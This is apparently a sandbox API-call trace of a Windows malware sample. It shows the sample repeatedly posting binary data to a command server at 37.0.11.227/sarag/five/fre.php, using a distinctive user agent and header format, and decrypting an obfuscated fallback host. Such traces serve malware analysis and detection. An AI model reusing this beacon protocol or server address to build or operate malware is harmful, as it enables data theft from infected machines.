[0344.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0344.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.412] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0344.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.413] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0344.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.414] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0344.414] GetProcessHeap () returned 0x690000 [0344.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0344.414] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0344.414] GetProcessHeap () returned 0x690000 [0344.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0344.414] socket (af=2, type=1, protocol=6) returned 0xc78 [0344.417] connect (s=0xc78, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0344.448] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0344.448] GetProcessHeap () returned 0x690000 [0344.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0344.450] GetProcessHeap () returned 0x690000 [0344.450] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0344.451] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.452] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0344.452] GetProcessHeap () returned 0x690000 [0344.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0344.452] GetProcessHeap () returned 0x690000 [0344.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.453] GetProcessHeap () returned 0x690000 [0344.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0344.453] GetProcessHeap () returned 0x690000 [0344.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0344.453] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.454] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0344.454] GetProcessHeap () returned 0x690000 [0344.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0344.454] GetProcessHeap () returned 0x690000 [0344.455] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.455] send (s=0xc78, buf=0x6ad508*, len=242, flags=0) returned 242 [0344.455] send (s=0xc78, buf=0x6aba40*, len=159, flags=0) returned 159 [0344.455] GetProcessHeap () returned 0x690000 [0344.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0344.456] recv (in: s=0xc78, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0344.529] GetProcessHeap () returned 0x690000 [0344.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0344.530] GetProcessHeap () returned 0x690000 [0344.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0344.530] GetProcessHeap () returned 0x690000 [0344.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0344.531] GetProcessHeap () returned 0x690000 [0344.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0344.531] closesocket (s=0xc78) returned 0 [0344.532] GetProcessHeap () returned 0x690000 [0344.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0344.532] GetProcessHeap () returned 0x690000 [0344.532] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.533] GetProcessHeap () returned 0x690000 [0344.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0344.533] GetProcessHeap () returned 0x690000 [0344.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0344.539] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19c8) returned 0xc78 [0344.543] Sleep (dwMilliseconds=0xea60) [0344.545] GetProcessHeap () returned 0x690000 [0344.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0344.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0344.568] GetProcessHeap () returned 0x690000 [0344.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0344.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.569] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.571] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.576] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.576] GetProcessHeap () returned 0x690000 [0344.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0344.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.578] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0344.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.579] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.580] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0344.581] GetProcessHeap () returned 0x690000 [0344.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.582] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0344.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.587] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0344.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.589] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0344.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0344.591] GetProcessHeap () returned 0x690000 [0344.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0344.591] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0344.591] GetProcessHeap () returned 0x690000 [0344.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0344.592] GetProcessHeap () returned 0x690000 [0344.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.592] GetProcessHeap () returned 0x690000 [0344.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0344.593] GetProcessHeap () returned 0x690000 [0344.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0344.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.594] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.605] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0344.648] GetProcessHeap () returned 0x690000 [0344.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0344.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.650] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.652] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.652] GetProcessHeap () returned 0x690000 [0344.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0344.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.653] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0344.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.654] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.655] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0344.655] GetProcessHeap () returned 0x690000 [0344.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.656] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0344.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.657] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0344.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.658] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0344.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.659] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0344.659] GetProcessHeap () returned 0x690000 [0344.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0344.659] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0344.659] GetProcessHeap () returned 0x690000 [0344.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0344.659] socket (af=2, type=1, protocol=6) returned 0xc7c [0344.659] connect (s=0xc7c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0344.685] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0344.685] GetProcessHeap () returned 0x690000 [0344.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0344.685] GetProcessHeap () returned 0x690000 [0344.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0344.685] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.686] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0344.686] GetProcessHeap () returned 0x690000 [0344.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0344.686] GetProcessHeap () returned 0x690000 [0344.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.687] GetProcessHeap () returned 0x690000 [0344.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0344.687] GetProcessHeap () returned 0x690000 [0344.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0344.688] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0344.688] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0344.688] GetProcessHeap () returned 0x690000 [0344.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0344.688] GetProcessHeap () returned 0x690000 [0344.689] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0344.689] send (s=0xc7c, buf=0x6ad508*, len=242, flags=0) returned 242 [0344.689] send (s=0xc7c, buf=0x6aba40*, len=159, flags=0) returned 159 [0344.689] GetProcessHeap () returned 0x690000 [0344.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0344.689] recv (in: s=0xc7c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0344.782] GetProcessHeap () returned 0x690000 [0344.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0344.782] GetProcessHeap () returned 0x690000 [0344.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0344.783] GetProcessHeap () returned 0x690000 [0344.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0344.783] GetProcessHeap () returned 0x690000 [0344.783] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0344.783] closesocket (s=0xc7c) returned 0 [0344.784] GetProcessHeap () returned 0x690000 [0344.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0344.784] GetProcessHeap () returned 0x690000 [0344.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.784] GetProcessHeap () returned 0x690000 [0344.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0344.785] GetProcessHeap () returned 0x690000 [0344.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0344.785] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19cc) returned 0xc7c [0344.790] Sleep (dwMilliseconds=0xea60) [0344.792] GetProcessHeap () returned 0x690000 [0344.792] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0344.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.792] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0344.808] GetProcessHeap () returned 0x690000 [0344.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0344.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.809] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.810] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.811] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.811] GetProcessHeap () returned 0x690000 [0344.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0344.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.813] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0344.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.817] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.818] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0344.818] GetProcessHeap () returned 0x690000 [0344.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.819] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0344.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.820] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0344.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.828] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0344.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.829] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0344.830] GetProcessHeap () returned 0x690000 [0344.830] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0344.830] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0344.830] GetProcessHeap () returned 0x690000 [0344.830] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0344.831] GetProcessHeap () returned 0x690000 [0344.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0344.831] GetProcessHeap () returned 0x690000 [0344.831] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0344.831] GetProcessHeap () returned 0x690000 [0344.831] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0344.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0344.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.842] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0344.852] GetProcessHeap () returned 0x690000 [0344.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0344.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.853] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0344.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.854] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0344.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.855] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0344.855] GetProcessHeap () returned 0x690000 [0344.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0344.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.858] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0344.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.859] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0344.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0344.860] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0344.860] GetProcessHeap () returned 0x690000 [0344.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0344.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.861] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0344.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.862] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0344.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.863] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0344.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0344.864] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0344.864] GetProcessHeap () returned 0x690000 [0344.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0344.864] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0344.864] 